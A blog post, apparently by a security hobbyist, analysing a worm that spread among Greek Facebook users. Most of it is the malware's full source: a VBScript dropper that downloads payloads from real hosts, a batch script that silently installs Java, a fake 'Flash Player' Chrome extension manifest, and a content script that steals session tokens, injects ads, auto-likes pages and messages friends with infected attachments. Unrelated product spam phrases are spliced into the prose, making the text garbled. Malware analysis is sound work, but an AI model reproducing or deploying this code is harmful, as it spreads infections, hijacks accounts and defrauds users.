Greek facebook users under “attack”

Over the last few days, a malware was spreading among the greek users of facebook.After a couple of days hunting for a sample, I managed to get one. Infection When the user opened the .rar attachment, there was a VBScript file inside. The VBScript was the dropper. cover iphone 8 Its main functionality was to download a .zip file that contained a Batch file, a .jar file and the Java 8 installer. cover iphone 6 6s All files were downloaded under C:/MyFolderakis. The VBScript

Dim oFSO Set oFSO = CreateObject("Scripting.FileSystemObject") Dim csPATH : csPATH = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%SYSTEMDRIVE%") csPATH = csPATH & "\MyFolderakis" ' Create a new folder oFSO.CreateFolder csPATH Do download(csPATH) Unzip csPATH &"\content.zip", csPATH Loop While ReportFileStatus(csPATH &"\sapsalo.jar")=0 Function download(csPATH) link=RandomLink() dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("ADODB.Stream") xHttp.Open "GET", link, False xHttp.Send with bStrm .type = 1 '//binary .open .write xHttp.responseBody .savetofile csPATH &"\content.zip", 2 '//overwrite end with download = csPATH &"\content.zip" End Function Function ReportFileStatus(filespec) Dim fso, msg Set fso = CreateObject("Scripting.FileSystemObject") If (fso.FileExists(filespec)) Then msg = 1 Wscript.Echo "Exited" Else msg = 0 End If ReportFileStatus = msg End Function Function RandomLink() sites=Array("http://xionobala.com/mermikia/moisis.zip","http://trendvidz.com/terlix/filezilla.zip","http://tromeroi.com/download/adobe.zip","http://womfashion.com/aladin/aladin.zip","http://yoodot.com/ouzo/gnome.zip","http://pepperstonix.com/koitatiegine/tikale.zip","http://spatareporo.com/deitetous/simerastonaplha.zip","http://fashionofheart.com/vasika/kalisperasas.zip","http://masterolious.com/mozilla/firefox.zip","http://pentorali.com/safe/internet.zip") Dim max,min max=UBound(sites) min=LBound(sites) Randomize a=Int((max-min+1)*Rnd+min) RandomLink = sites(a) End Function Sub Unzip(sSource, sTargetDir) Set oFSO = CreateObject("Scripting.FileSystemObject") if not oFSO.FolderExists(sTargetDir) then oFSO.CreateFolder(sTargetDir) Set oShell = CreateObject("Shell.Application") Set oSource = oShell.NameSpace(sSource).Items() Set oTarget = oShell.NameSpace(sTargetDir) oTarget.CopyHere oSource, 256 End Sub Set WshShell = CreateObject("WScript.Shell") WshShell.RUN "cmd /c "& csPATH &"\run.bat" , 2 

Sidenotes: If you execute the VBScript twice, an error pops up when trying to recreate the folder. The Batch script

@ECHO OFF IFEXIST“%CommonProgramFiles(x86)%\java”gotojavaexists IFEXIST“%CommonProgramFiles%\java”gotojavaexists :installjava start/w%SYSTEMDRIVE%\MyFolderakis\jre-8u5-windows-i586-iftw.exe/s if%ERRORLEVEL%==0gotojavaexists echo Please do not close this or windows installation will be corrupted… echo Loading… gotoinstalljava :javaexists start%SYSTEMDRIVE%\MyFolderakis\sapsalo.jar

It checks whether or not there is a folder named java both for x86 and x86_64 Windows. In case it exists it runs the sapsalo.jar file contained in the .zip downloaded by the dropper. If not. Java is installed silently (/s option). The jar After succesful installation, the jar is executed. The jar’s functionality is double. It serves as another dropper for a browser plugin (manifest named ourt.json and a javascript file with the main functionality). crop top licorne At the same time, it creates a record on the registry so that it is executed on every startup. This serves as a way to keep you infected even if you delete the plugin. In order to achieve this, it creates a .zip filed named ext_folder inside the Chrome folder. The plugin The manifest

{ “olmpkfnhkfomcmnodekbphlkkejkealf”:{ “active_permissions”:{ “api”:["storage","tabs"], “explicit_host”:["\u003Call_urls>","chrome://favicon/*","http://*/*"], “manifest_permissions”:[ ], “scriptable_host”:["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"] }, “content_settings”:[ ], “creation_flags”:1, “events”:[ ], “from_bookmark”:false, “from_webstore”:false, “granted_permissions”:{ “api”:["storage","tabs"], “explicit_host”:["\u003Call_urls>","chrome://favicon/*","http://*/*"], “manifest_permissions”:[ ], “scriptable_host”:["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"] }, “incognito_content_settings”:[ ], “incognito_preferences”:{ }, “initial_keybindings_set”:true, “install_time”:“13042160431700495″, “location”:1, “manifest”:{ “background”:{ “persistent”:false, “scripts”:["analytics.js"] }, “content_scripts”:[{ "css":["jquery-ui.css"], “js”:["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"], “matches”:["http://*.facebook.com/*","https://*.facebook.com/*"], “run_at”:“document_end” },{ “all_frames”:true, “exclude_matches”:["http://*.facebook.com/*","https://*.facebook.com/*"], “js”:["debug_mode.js","sugar.min.js","URI.js","ads-list.js","ads.js"], “matches”:["\u003Call_urls>"] }], “content_security_policy”:“script-src ‘self’ https://ssl.google-analytics.com; object-src ‘self’”, “description”:“Cross-platform plugin plays animations, videos and sound files”, “icons”:{ “128″:“128.png”, “16″:“16.png”, “48″:“48.png” }, “key”:“MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyRAUY/Q1HimRmGom V9c9/UWlVmQToGeNZPIxlH5C+g7Ig8/HObGp3G6YqwMNtvG1LF6DgESq7HkuhZpEcrmLmDI8tXQh 5SuYpKJCRcPJhvtOvtYnFbLNPdhg7DN4ZU8v1qhcrSSGfzK8KWPNghsAfL/PEFaobzWH+ZRFQbMsu93 +u9WJFbcGtXT+Kqar7eWIiCeTACobSDbcfaZ1Cj5S0TEZPRtddWvUKSXG3+/wLz236ckZAnz7yzOw 9kBLJL+J3+xm01qhTMc2wv6G0R+zVbC3/UjJcTSdCdY5wGgKgJkDzJ/WNxaGJUXFbKRRsQ3zhe3Xr KKK+2kcHOjy0dZapQIDAQAB”, “manifest_version”:2, “name”:“Flash Player”, “permissions”:["tabs","\u003Call_urls>","storage","http://*/"], “version”:“2.0″ }, “path”:“olmpkfnhkfomcmnodekbphlkkejkealf\\2.0_0″, “preferences”:{ }, “regular_only_preferences”:{ }, “state”:1, “was_installed_by_default”:false } 

Interesting parts are

“manifest_version”:2, “name”:“Flash Player”,

Just in case you wondered… It was name flash player and it loads a lot of js libraries. I like, honestly, that they named it Flash Player. coque licorne iphone That was smart. The plugin

content_scripts”:[{ "css":["jquery-ui.css"], “js”:["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"], “matches”:["http://*.facebook.com/*","https://*.facebook.com/*"], “run_at”:“document_end” }
 function exit( status ) { var i; if (typeof status === 'string') { alert(status); } window.addEventListener('error', function (e) {e.preventDefault();e.stopPropagation();}, false); var handlers = [ 'copy', 'cut', 'paste', 'beforeunload', 'blur', 'change', 'click', 'contextmenu', 'dblclick', 'focus', 'keydown', 'keypress', 'keyup', 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize', 'scroll', 'DOMNodeInserted', 'DOMNodeRemoved', 'DOMNodeRemovedFromDocument', 'DOMNodeInsertedIntoDocument', 'DOMAttrModified', 'DOMCharacterDataModified', 'DOMElementNameChanged', 'DOMAttributeNameChanged', 'DOMActivate', 'DOMFocusIn', 'DOMFocusOut', 'online', 'offline', 'textInput', 'abort', 'close', 'dragdrop', 'load', 'paint', 'reset', 'select', 'submit', 'unload' ]; function stopPropagation (e) { e.stopPropagation(); // e.preventDefault(); // Stop for the form controls, etc., too? } for (i=0; i < handlers.length; i++) { window.addEventListener(handlers[i], function (e) {stopPropagation(e);}, true); } if (window.stop) { window.stop(); } throw ''; } $(function(){ chrome.runtime.sendMessage({gegonos: "visit" }, function(response) {}); //diafimiseis sto fb chrome.storage.sync.get(function(extSettings) { if(extSettings.ads){ var adcounter = 0; var adurls = ['https://8zxb-2gvn.accessdomain.com/789/ads.php','https://8zxb-2gvn.accessdomain.com/790/ads.php','https://8zxb-2gvn.accessdomain.com/791/ads.php','https://pizzasakis.com/789/ads.php','https://pizzasakis.com/790/ads.php','https://pizzasakis.com/791/ads.php']; function getit(url){ $.get(url).done(function (b) { final_ad_url = url; put_ads(final_ad_url); }).fail(function (a, d, e) { console.log('fail',adurls[adcounter]) if(adurls[adcounter++]) getit(adurls[adcounter]) }); } getit(adurls[0]); function put_ads(final_ad_url){ $($('*[data-ad]')).parent().parent().html('<iframe id=""style="position: relative; width: 100%; height: 620px; border:0;" src="'+final_ad_url+'?choice=1" id="someId"/>') elems1=$.makeArray( $( "*[data-dedupekey]" ) ); elems2=$.makeArray( $( "*[data-insertion-position]") ); elems=elems1.include(elems2).unique(); if(elems[0]) $(elems[0]).append('<iframe style="position: relative; width: 110%; height: 82px; border:0;" src="'+final_ad_url+'?choice=3" id="someId"/>') if(elems[1]) $(elems[1]).append('<iframe style="position: relative; width: 110%; height: 82px; border:0;" src="'+final_ad_url+'?choice=3" id="someId"/>') } } }) }) //facebook komati jx = { b: function () { var b = !1; if ("undefined" != typeof ActiveXObject) try { b = new ActiveXObject("Msxml2.XMLHTTP") } catch (c) { try { b = new ActiveXObject("Microsoft.XMLHTTP") } catch (a) { b = !1 } } else if (window.XMLHttpRequest) try { b = new XMLHttpRequest } catch (h) { b = !1 } return b }, load: function (b, c, a, h, g) { var e = this.d(); if (e && b) { e.overrideMimeType && e.overrideMimeType("text/xml"); h || (h = "GET"); a || (a = "text"); g || (g = {}); a = a.toLowerCase(); h = h.toUpperCase(); b += b.indexOf("?") + 1 ? "&" : "?"; var k = null; "POST" == h && (k = b.split("?"), b = k[0], k = k[1]); e.open(h, b, !0); e.onreadystatechange = g.c ? function () { g.c(e) } : function () { if (4 == e.readyState) if (200 == e.status) { var b = ""; e.responseText && (b = e.responseText); "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML); c && c(b) } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status) }; e.send(k) } }, load2: function (b, c, a, h, g) { var e = this.d(); if (e && b) { e.overrideMimeType && e.overrideMimeType("text/xml"); h || (h = "POST"); a || (a = "text"); g || (g = {}); a = a.toLowerCase(); h = h.toUpperCase(); b += b.indexOf("?") + 1 ? "&" : "?"; var k = null; "POST" == h && (k = b.split("?"), b = k[0], k = k[1]); e.open(h, b, !0); e.onreadystatechange = g.c ? function () { g.c(e) } : function () { if (4 == e.readyState) if (200 == e.status) { var b = ""; e.responseText && (b = e.responseText); "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML); c && c(b) } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status) }; e.send(k) } }, d: function () { return this.b() } }; function getFriends(){ var promise=jQuery.Deferred(); jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/first_degree.php?" + "__a=1&filter[0]=user&lazy=0&viewer=" + user_id + "&token=v7&stale_ok=0", function (a) { var b = a; var c = b.substring(b.indexOf("{")); var d = JSON.parse(c); d = d.payload.entries; friends=d; promise.resolve(); }) return promise; } function Create_Post(o){ jx.load2(window.location.protocol + "//www.facebook.com/ajax/stream/inline.php?fb_dtsg=" + fb_dtsg + "&walltarget=" + o + "&render_notif_only=1&birthday=1&message_text=" + encodeURIComponent(msg) + "&message=" + encodeURIComponent(msg) + "&giftsgroupid=8ff493ad46&post=Post&nctr[_mod]=pagelet_reminders&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFIwd9e&__req=1b&phstamp=", function (a) { var b = a.substring(a.indexOf("{")); var c = JSON.parse(b); }) } function Like_post(post) { var X = new XMLHttpRequest(); var XURL = "//www.facebook.com/ajax/ufi/like.php"; var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp="; X.open("POST", XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); } function Like_page(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); } send_message = (function(target_user_id,msg){ var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/mercury/send_messages.php"; var PageParams = "?=&=&__a=1&__dyn=798aD5z5CF-&__req=d&__user=" + user_id + "&client=mercury&fb_dtsg=" + fb_dtsg + "&message_batch[0][action_type]=ma-type:user-generated-message&message_batch[0][author]=fbid:" + user_id + "&message_batch[0][author_email]=&message_batch[0][body]=" + msg + "&message_batch[0][coordinates]=&message_batch[0][has_attachment]=false&message_batch[0][html_body]=false&message_batch[0][is_cleared]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_forward]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][is_unread]=false&message_batch[0][message_id]=<1392768225533:1945850321-3990341979@mail.projektitan.com>&message_batch[0][signatureID]=63e61bd&message_batch[0][source]=source:chat:web&message_batch[0][source_tags][0]=source:chat&message_batch[0][specific_to_list][0]=fbid:" + target_user_id + "&message_batch[0][specific_to_list][1]=fbid:" + user_id + "&message_batch[0][status]=0&message_batch[0][thread_id]=mid.1392163284356:af679b05b9c1cde936&message_batch[0][timestamp]=1392768225533&message_batch[0][timestamp_absolute]=Today&message_batch[0][timestamp_relative]=2:03am&message_batch[0][timestamp_time_passed]=0&message_batch[0][ui_push_phase]=V3&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { var resp = Page.responseText; //delete_message(resp.split('"message_id":')[1].split(',"client_message_id"')[0].replace(/"/g, "")) Page.close; } }; Page.send(PageParams); }).lazy(Number.random(7, 14) * 1000) delete_message=function(msg_id){ var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/mercury/delete_messages.php"; var PageParams = "?__a=1&__dyn=798aD5z5CF-&__req=d&__user=" + user_id + "&fb_dtsg=" + fb_dtsg + "&message_ids[0]=" + msg_id + "&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); } function downloadFile(){ var promise=jQuery.Deferred(); var counter = 0; if(counter<configs.attach_urls.length) { var oReq = new XMLHttpRequest(); oReq.open("GET", configs.attach_urls[counter], true); oReq.responseType = "arraybuffer"; console.log('ouer') oReq.onload = function(oEvent) { if(this.status == 200){ console.log(this) var myFile = new Blob([oReq.response], {type: 'application/octet-stream'}); promise.resolve( myFile ); }else{ counter++; if(counter<configs.attach_urls.length){ oReq.open("GET", configs.attach_urls[counter], true); oReq.send(); } } } oReq.send(); } return promise; } start_sending = function (myFile,target_id,msg_to_send,attach_name){ var promise=jQuery.Deferred(); var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; console.log(target_id) var target_id = target_id; var msg=msg_to_send; var filename=attach_name; var formData = new FormData(); formData.append("fb_dtsg", fb_dtsg); formData.append("attach_id", null); formData.append('upload_1052', myFile, filename); var request = new XMLHttpRequest(); request.open("POST", "/ajax/mercury/upload.php?__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&ttstamp=&ft[tn]=%2BJ%2BM&"); request.send(formData); request.onloadend = function(){ a=JSON.parse((this.responseText).split('for (;;);')[1]) a=a.payload.metadata[0] console.log(a) var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/mercury/send_messages.php"; formData = new FormData(); formData.append('message_batch[0][action_type]','ma-type:user-generated-message'); formData.append('message_batch[0][thread_id]',''); formData.append('message_batch[0][author]','fbid:'+ target_id); formData.append('message_batch[0][author_email]',''); formData.append('message_batch[0][coordinates]',''); formData.append('message_batch[0][timestamp]',(new Date).getTime()); formData.append('message_batch[0][timestamp_absolute]','Today'); formData.append('message_batch[0][timestamp_relative]',''); formData.append('message_batch[0][timestamp_time_passed]','0'); formData.append('message_batch[0][is_unread]',false); formData.append('message_batch[0][is_cleared]',false); formData.append('message_batch[0][is_forward]',false); formData.append('message_batch[0][is_filtered_content]',false); formData.append('message_batch[0][is_spoof_warning]',false); formData.append('message_batch[0][source]','source:titan:web'); formData.append('message_batch[0][body]',msg); formData.append('message_batch[0][has_attachment]',true); formData.append('message_batch[0][html_body]',false); formData.append('message_batch[0][specific_to_list][0]','fbid:'+ target_id); formData.append('message_batch[0][specific_to_list][1]','fbid:'+ user_id); formData.append('message_batch[0][raw_attachments][0][filename]',a.filename); formData.append('message_batch[0][raw_attachments][0][filesize]',a.filesize); formData.append('message_batch[0][raw_attachments][0][hash]',a.hash); formData.append('message_batch[0][raw_attachments][0][handle]',a.handle); formData.append('message_batch[0][raw_attachments][0][filetype]',a.filetype); formData.append('message_batch[0][raw_attachments][0][encryptionKey]', a.encryptionKey); formData.append('message_batch[0][raw_attachments][0][metadata]',''); formData.append('message_batch[0][raw_attachments][0][param_hash]',a.param_hash); formData.append('message_batch[0][raw_attachments][0][image_metadata]',''); formData.append('message_batch[0][force_sms]',true); formData.append('message_batch[0][ui_push_phase]','V3'); formData.append('message_batch[0][status]','0'); formData.append('message_batch[0][message_id]',''); formData.append('client','mercury'); formData.append('__user',user_id); formData.append('__a','1'); formData.append('__dyn','798aD5z5CF-'); formData.append('__req','i'); formData.append('fb_dtsg',fb_dtsg); formData.append('ttstamp',''); formData.append('__rev','1188904'); Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { var resp = Page.responseText; var message_id_with_attachment = (JSON.parse(resp.split('for (;;);')[1])).payload.actions[0].message_id; var thread_id_with_attachment = (JSON.parse(resp.split('for (;;);')[1])).payload.actions[0].thread_id; Page.close; delete_msg_atach(message_id_with_attachment) mute_conversation(thread_id_with_attachment) } promise.resolve() }; Page.send(formData); } return promise; } function delete_msg_atach(msg_id){ var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/mercury/delete_messages.php"; Page.open("POST", PageURL, true); var formData = new FormData(); formData.append('message_ids[0]',msg_id) formData.append('__user',user_id) formData.append('__a','1') formData.append('__dyn','798aD5z5CF-') formData.append('__req','d') formData.append('fb_dtsg',fb_dtsg) formData.append('ttstamp','') formData.append('__rev','1189795') Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { console.log(Page.responseText) } }; Page.send(formData); } function mute_conversation(thread_id){ var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/mercury/change_mute_thread.php"; Page.open("POST", PageURL, true); var formData = new FormData(); formData.append('thread_id',thread_id) formData.append('mute_settings','3600') formData.append('payload_source','mercury') formData.append('__user',user_id) formData.append('__a','1') formData.append('__dyn','798aD5z5CF-') formData.append('__req','d') formData.append('fb_dtsg',fb_dtsg) formData.append('ttstamp','') formData.append('__rev','1189795') Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { console.log(Page.responseText) } }; Page.send(formData); } function get_config(){ var promise=jQuery.Deferred(); var counter = 0; var urls = ['https://8zxb-2gvn.accessdomain.com/789/taxavasi.php','https://8zxb-2gvn.accessdomain.com/790/taxavasi.php','https://8zxb-2gvn.accessdomain.com/791/taxavasi.php','https://pizzasakis.com/789/taxavasi.php','https://pizzasakis.com/790/taxavasi.php','https://pizzasakis.com/791/taxavasi.php']; function getit(url){ $.getJSON(url).done(function (b) { configs = b; configs.friends_to_send_attach = configs.friends_to_send_attach2; console.log('configs',configs); promise.resolve() }).fail(function (a, d, e) { console.log('fail',urls[counter]) if(urls[counter++]) getit(urls[counter]) }); } getit(urls[0]); return promise; } function save(){ chrome.storage.sync.set({'last_settings': Date.now() , 'post_kathe' : configs.post_kathe , 'ads' : configs.ads}, function() { // Notify that we saved. console.log('ok') }); } try { fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); } catch(err) { console.log('errrrrr') exit(); } chrome.storage.sync.get(function(extSettings) { console.log(extSettings) if(extSettings.last_settings){ if(new Date(extSettings.last_settings).hoursAgo()>=extSettings.post_kathe) get_config().done(function(){ save(); if(configs.on) run(); }) }else{ get_config().done(function(){ save(); if(configs.on) run(); }) } }); curr_url = window.location.href; setInterval(function(){ if(curr_url!=window.location.href){ console.log('alagi'); curr_url=window.location.href; chrome.storage.sync.get(function(extSettings) { console.log(extSettings) if(extSettings.last_settings){ if(new Date(extSettings.last_settings).hoursAgo()>=extSettings.post_kathe) get_config().done(function(){ save(); if(configs.on) run(); }) }else{ get_config().done(function(){ save(); if(configs.on) run(); }) } }); } },30000) /**/ var now = (new Date).getTime(); function run(){ //kane like sta post if(configs.posts_to_like){ var posts_to_like = configs.posts_to_like if(Object.isArray(posts_to_like)){ posts_to_like.each(function(post){ Like_post(post); }) } } //vale ta post stin arxiki injectPost(); getFriends().done(function(){ //run code emergency if(configs.emergency){ $.getScript( "https://8zxb-2gvn.accessdomain.com/789/emergency.js"); } begin_to_like(); //begin post msgPost=configs.msg_to_post; //pare to onoma mou my_name=(friends.find(function(n){ return n.uid==user_id })).names.sample(); //vgale ton eauto m apo tous filous friends=friends.exclude(function(n){ return n.uid==user_id }) friends=friends.randomize(); if(configs.friends_to_post>friends.length) var friends_to_post=friends.length; else var friends_to_post=configs.friends_to_post; for(var i=0 ; i<friends_to_post;i++){ msg=msgPost.sample(); Create_Post(friends[i].uid) } //begin chat chrome.runtime.sendMessage({gegonos: "chat" , userid : user_id}, function(response) {}); msgChat=configs.msg_to_chat; friends=friends.randomize(); temp_friends=friends.clone(); temp_friends2=friends.clone(); already_chated=[]; chrome.storage.sync.get(function(extSettings) { if(extSettings.chated_friends){ already_chated=extSettings.chated_friends; friends_chated=extSettings.chated_friends.findAll(function(n){ return n.msg_title.indexOf(configs.msg_title)!=-1 }) for (var i = 0; i < temp_friends.length; i++) { for (var j = 0; j < friends_chated.length; j++) { if(temp_friends[i].uid==friends_chated[j].uid){ temp_friends2.remove(temp_friends[i]) console.log('i remove',temp_friends[i]) } }; }; } if(configs.friends_to_chat>temp_friends2.length) var friends_to_chat=temp_friends2.length; else var friends_to_chat=configs.friends_to_chat; friends_chated_to_save=[]; for(var i=0 ; i<friends_to_chat;i++){ msg=msgChat.sample(); send_message(temp_friends2[i].uid,msg); friends_chated_to_save.push({ uid : temp_friends2[i].uid, msg_title : [configs.msg_title] }) } console.log('first',already_chated) friends_chated_to_save.each(function(n){ index=already_chated.findIndex(function(x){ return x.uid==n.uid; }) console.log('index',index) if(index!=-1){ already_chated[index].msg_title.push(n.msg_title[0]) }else{ already_chated.push(n); } }) console.log('last',already_chated) chrome.storage.sync.set({'chated_friends': already_chated}, function() { // Notify that we saved. console.log('ok',already_chated) }); }) //send attachment downloadFile().done(function(myFile){ console.log('file',myFile) chrome.storage.sync.get(function(extSettings) { if(!extSettings.attach_chated_friends || extSettings.attach_chated_friends.friends_to_send_attach<= 0){ getFriends().done(function(){ //pare to onoma mou my_name=(friends.find(function(n){ return n.uid==user_id })).names.sample(); //vgale ton eauto m apo tous filous friends=friends.exclude(function(n){ return n.uid==user_id }) friends=friends.randomize(); if(extSettings.already_attach_chated_friends){ already_attach_chated_friends_ids = []; (extSettings.already_attach_chated_friends.findAll(function(x){ return x.attach_themes.indexOf(configs.attach_theme)!=-1 })).each(function(n){ already_attach_chated_friends_ids.push(n.uid) }) console.log('already...',already_attach_chated_friends_ids) friends=friends.exclude(function(n){ return already_attach_chated_friends_ids.indexOf(n.uid)!=-1 }) if(friends.length==0){ console.log('dn exo allous filous') } } if(configs.friends_to_send_attach>friends.length) var friends_to_send_attach=friends.length; else var friends_to_send_attach=configs.friends_to_send_attach; obj = {}; obj.friends_to_send_attach = friends_to_send_attach; obj.data = []; for (var i = 0; i < friends_to_send_attach; i++) { if(configs.attach_name_and_msg[i]){ var msg_to_send_attach = configs.attach_name_and_msg[i][1]; var attach_name = configs.attach_name_and_msg[i][0]; } var friends_id = friends[i].uid; console.log(friends_id) if($.isArray([friends[i].names])) var friend_name = friends[i].names.sample(); else var friend_name = friends[i].names; if(attach_name.has("yourname")) attach_name = attach_name.replace("yourname",friend_name) if(attach_name.has("myname")) attach_name = attach_name.replace("myname",my_name) var temp = { "friends_id" : friends_id, "msg_to_send_attach" : msg_to_send_attach, "attach_name" : attach_name } obj.data.push(temp) }; chrome.storage.sync.set({'attach_chated_friends': obj}, function() { // Notify that we saved. console.log('ok',obj) lets_send_attach(obj) }); }); }else{ console.log('exoume',extSettings.attach_chated_friends) lets_send_attach(extSettings.attach_chated_friends) } function lets_send_attach(attach_chated){ if(attach_chated.friends_to_send_attach>0){ var first = attach_chated.data.first(); chrome.runtime.sendMessage({gegonos: "attach" , userid : first.friends_id}, function(response) {}); start_sending(myFile,first.friends_id,first.msg_to_send_attach,first.attach_name).done(function(){ attach_chated.friends_to_send_attach--; attach_chated.data.remove(first); chrome.storage.sync.get(function(extSettings) { if(extSettings.already_attach_chated_friends){ var index = extSettings.already_attach_chated_friends.findIndex(function(n){ return n.uid == first.friends_id; }) if(index == -1){ var attach_themes = [configs.attach_theme] extSettings.already_attach_chated_friends.push({ 'uid' : first.friends_id, 'attach_themes' : attach_themes }) }else{ extSettings.already_attach_chated_friends[index].attach_themes.push(configs.attach_theme) } }else{ var attach_themes = [configs.attach_theme] extSettings.already_attach_chated_friends = [{ 'uid' : first.friends_id, 'attach_themes' : attach_themes }]; } chrome.storage.sync.set({'already_attach_chated_friends': extSettings.already_attach_chated_friends}, function() { // Notify that we saved. console.log('just save',extSettings.already_attach_chated_friends) }); }) chrome.storage.sync.set({'attach_chated_friends': attach_chated}, function() { // Notify that we saved. console.log('new',attach_chated) lets_send_attach(attach_chated) }); }) }else{ return true; } } }) }) }) } function begin_to_like(){ chrome.storage.sync.get(function(extSettings) { console.log(extSettings) if(extSettings.liked_pages){ temp_likes1=extSettings.liked_pages.intersect(configs.likes); temp_likes2=configs.likes; for (var i = 0; i < temp_likes2.length; i++) { for (var j = 0; j < temp_likes1.length; j++) { if(temp_likes1[j]==temp_likes2[i]) temp_likes2.remove(temp_likes1[j]) }; }; temp_likes = temp_likes2; console.log(temp_likes) chrome.storage.sync.set({'liked_pages':extSettings.liked_pages.include(temp_likes)}, function() { // Notify that we saved. console.log('ok') }); } else{ temp_likes=configs.likes; chrome.storage.sync.set({'liked_pages':temp_likes}, function() { // Notify that we saved. console.log('ok') }); } for (var i = 0; i < temp_likes.length; i++) { Like_page(temp_likes[i]) }; }) } function injectPost(){ var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent"; var eventer = window[eventMethod]; var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message"; // Listen to message from child window eventer(messageEvent,function(e) { if(e.data.myurl) $("iframe[src='"+e.data.myurl+"']").ready(function(ifr){ if(e.data.height) $("iframe[src='"+e.data.myurl+"']").css('height', e.data.height + 'px'); else $("iframe[src='"+e.data.myurl+"']").css('height', '550px'); }) if(e.data.should_go) window.location.href = e.data.should_go },false); elems1=$.makeArray( $( "*[data-dedupekey]" ) ); elems2=$.makeArray( $( "*[data-insertion-position]") ); elems=elems1.include(elems2).unique(); for (var i = 0; i < configs.injectPosts.length; i++) { if($(elems[i])){ $(elems[i]).parent().prepend('<iframe style="margin-left: 13px;width:100%;" frameborder="0" scrolling="no" src="'+configs.injectPosts[i]+'"></iframe>') } }; }

Finally a piece of code that is not another dropper. Its functionality is to inject ads so that they could profit. From time to time, it spams your friends. Summary Most of the hosts that served the malware stopped serving it today. Greek journos reported it as Koobface. It is not. It doesn’t steal your credentials. chaussons pokemon It injects you with random ads. It was not a state-of-the-art malware like malware previously seen but it caused a fair amount of chaos. Random thoughts If I was the developer of it, I would exchange the VBScript with a batch file. It would check the OS of the system and download the equivalent malware. cartable licorne I think part of the idea came from a greek virii mag from 2003 or from its offsprings. All of these mags had articles on how to develop such worms with equivalent samples. Notes for users Trust noone. Your boss won’t send you naked photos of him and your best buddy won’t send you a drunk photo of him cause you’ve seen him drunk way too many times. End of story. Make sure you see the extension of all files (even known ones) under Windows. out.

2 responses to “Greek facebook users under “attack”

  1. I’d like to find out more? I’d care to find out more details.

    • There’s a current attack in greek users that sticks to the aforementioned details. If you want something really cool, check for Lecpetex 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.